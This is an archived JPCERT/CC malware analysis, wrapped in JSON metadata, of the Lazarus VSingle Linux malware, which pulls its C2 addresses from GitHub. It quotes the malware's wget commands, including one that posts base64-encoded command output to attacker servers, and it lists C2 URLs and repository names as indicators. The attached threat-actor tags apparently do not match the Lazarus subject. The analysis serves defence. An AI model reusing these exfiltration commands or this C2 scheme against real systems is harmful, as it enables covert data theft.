{
	"id": "d0cdc457-55a2-4064-b998-30dcc4735da4",
	"created_at": "2026-04-06T00:09:59.549862Z",
	"updated_at": "2026-04-10T03:30:11.936547Z",
	"deleted_at": null,
	"sha1_hash": "d25a60177ac4d1696f5c91f5f88bc7bd6a46bca2",
	"title": "VSingle malware that obtains C2 server information from GitHub - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 754604,
	"plain_text": "VSingle malware that obtains C2 server information from GitHub\r\n- JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2022-07-04 · Archived: 2026-04-05 22:48:51 UTC\r\nJuly 5, 2022\r\nLazarus\r\nSome types of malware use DGA, obfuscate destination information, or contain fake C2 server information in\r\norder to hide the original C2 server. Others obtain C2 server information from legitimate servers. Recently, the\r\nmalware used by Lazarus VSingle has been updated to retrieve C2 servers information from GitHub. This article\r\nfocuses on the updates of VSingle. VSingle has two versions, one targeting Windows OS and the other targeting\r\nLinux OS, and this article is based on the latter, which has more updates.\r\nOverview of VSingle\r\nVSingle has threehard-coded C2 servers. However, when it can not obtain data from them, the malware accesses\r\nGitHub to obtain new C2 servers. Figure 1 shows the operation flow of VSingle.\r\nhttps://blogs.jpcert.or.jp/en/2022/07/vsingle.html\r\nPage 1 of 7\n\nFigure 1: Operation flow of VSingle\r\nThe first communication sends the following data. uid contains a hashed value of the hostname, kernel release\r\nnumber, and an octet of IP address combined. upw contains a Base64-encoded string of \"[IP address]|30.0|12b\".\r\nhttps://mantis.westlinks.net/api/soap/mc_enum.php?uid=[ランダムな数字列]\u0026upw=[Base64文字列]\r\nThe data sent by the C2 server in response to the above request will be stored in the following directory. The data\r\nafter \u003ccontents\u003e in this data is the AES key, IV data and command (with Base64+RC4).\r\n/tmp/.sess_%08x\r\nIn the following sections, I would like to expoain the access patterns to GitHub and communication method.\r\nAccess Patterns to GitHub\r\nThe GitHub repository from which the communication is obtained is not fixed but dynamically generated. The\r\nfollowing is the pattern of URLs to be accessed.\r\nhttps://blogs.jpcert.or.jp/en/2022/07/vsingle.html\r\nPage 2 of 7\n\nhttps://raw.githubusercontent.com/%s/%s/master/README.de\r\nThe user name and repository name are the string randomly selected from the following list + a random string\r\nadded.\r\nTable 1: String used for username and repository names\r\nUsername Repository name\r\ngar3ia Arcan3\r\nwo0d Wr0te\r\ntr3e after\r\nlucky luxuryboy\r\nl0ve pnpgather\r\nv0siej happyv1m\r\ne0vvsje laz3rpik\r\npolaris d0ta\r\ngrav1ty Dronek\r\nw1inter Panda3\r\nsummer cpsponso\r\nggo0dlluck\r\nThe GitHub repository used by the attacker includes a URL in the \u003cvideolink1\u003e tag, as shown in Figure 2. The\r\nmalware obtains this URL from the GitHub repository and connects to it. See Appendix A for the GitHub\r\nrepositories that JPCERT/CC confirmed the attacker had used.\r\nhttps://blogs.jpcert.or.jp/en/2022/07/vsingle.html\r\nPage 3 of 7\n\nFigure 2: Example GitHub repository used by attackers\r\nCommunication Method\r\nThe current version of VSingle uses wget command to communicate with the C2 server while the previous\r\nversions used system call. Figure 3 shows a part of the code that executes the wget command. (Vsingle on\r\nWindows OS does not include this update and uses Windows API, not wget command.)\r\nFigure 3: A part of the code to execute the wget command\r\nWhile most types of malware in general use system call and/or API to communicate with C2 servers, VSingle\r\ndares to execute the wget command, which leaves traces easily. In addition, the communication results are always\r\nsaved in a file. During actual communication, the following commands are executed.\r\nsh -c \"wget -t 1 --server-response --no-check-certificate --user-agent=\\\"Mozilla/5.0 (X11; Linux x86_\r\nAs for the command execution results, the contents of the file (/tmp/.sess_%04x) in which the execution results\r\nare saved are Base64-encoded and sent via HTTP POST communication as shown below.\r\nsh -c \"wget -t 1 --server-response --no-check-certificate --post-data=\\\"uid=15022694\u0026fipng=`base64 /t\r\nIn closing\r\nhttps://blogs.jpcert.or.jp/en/2022/07/vsingle.html\r\nPage 4 of 7\n\nAttackers often tamper with legitimate web servers or use legitimate cloud services to conceal communication\r\nwith C2 servers. Since it is difficult to detect such malware from logs, it is recommended to take countermeasures\r\nsuch as limiting accessible destinations for servers with limited purpose. See the Appendix for the destinations of\r\nthe malware discussed in this article.\r\nShusei Tomonaga\r\n(Translated by Takumi Nakano)\r\nAppendix A: GitHub repository used by the attacker\r\nhttps://github.com/bgrav1ty13j/bPanda3\r\nhttps://github.com/fwo0d17n/fWr0te\r\nhttps://github.com/glucky18p/gluxuryboy\r\nhttps://github.com/gf00t18p/gpick/\r\nhttps://github.com/jv0siej21g/jlaz3rpik\r\nAppendix B: C2 Server\r\nhttps://mantis.westlinks.net/api/soap/mc_enum.php\r\nhttps://www.shipshorejob.com/ckeditor/samples/samples.php\r\nhttp://crm.vncgroup.com/cats/scripts/sphinxview.php\r\nhttps://ougreen.com/zone\r\nhttps://tecnojournals.com/general\r\nhttps://semiconductboard.com/xcror\r\nhttps://bluedragon.com/login\r\nhttps://tecnojournals.com/prest\r\nAppendix C: Malware hash value\r\n199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1\r\n2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc\r\n414ed95d14964477bebf86dced0306714c497cde14dede67b0c1425ce451d3d7\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially\r\ninvolved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security\r\nmonitoring and analysis operations at a foreign-affiliated IT vendor. He presented at CODE BLUE, BsidesLV,\r\nBlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nhttps://blogs.jpcert.or.jp/en/2022/07/vsingle.html\r\nPage 5 of 7\n\nRelated articles\r\nUpdate on Attacks by Threat Group APT-C-60\r\nCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks\r\nhttps://blogs.jpcert.or.jp/en/2022/07/vsingle.html\r\nPage 6 of 7\n\nMalware Identified in Attacks Exploiting Ivanti Connect Secure Vulnerabilities\r\nDslogdRAT Malware Installed in Ivanti Connect Secure\r\nTempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup\r\nSource: https://blogs.jpcert.or.jp/en/2022/07/vsingle.html\r\nhttps://blogs.jpcert.or.jp/en/2022/07/vsingle.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2022/07/vsingle.html"
	],
	"report_names": [
		"vsingle.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434199,
	"ts_updated_at": 1775791811,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d25a60177ac4d1696f5c91f5f88bc7bd6a46bca2.pdf",
		"text": "https://archive.orkl.eu/d25a60177ac4d1696f5c91f5f88bc7bd6a46bca2.txt",
		"img": "https://archive.orkl.eu/d25a60177ac4d1696f5c91f5f88bc7bd6a46bca2.jpg"
	}
}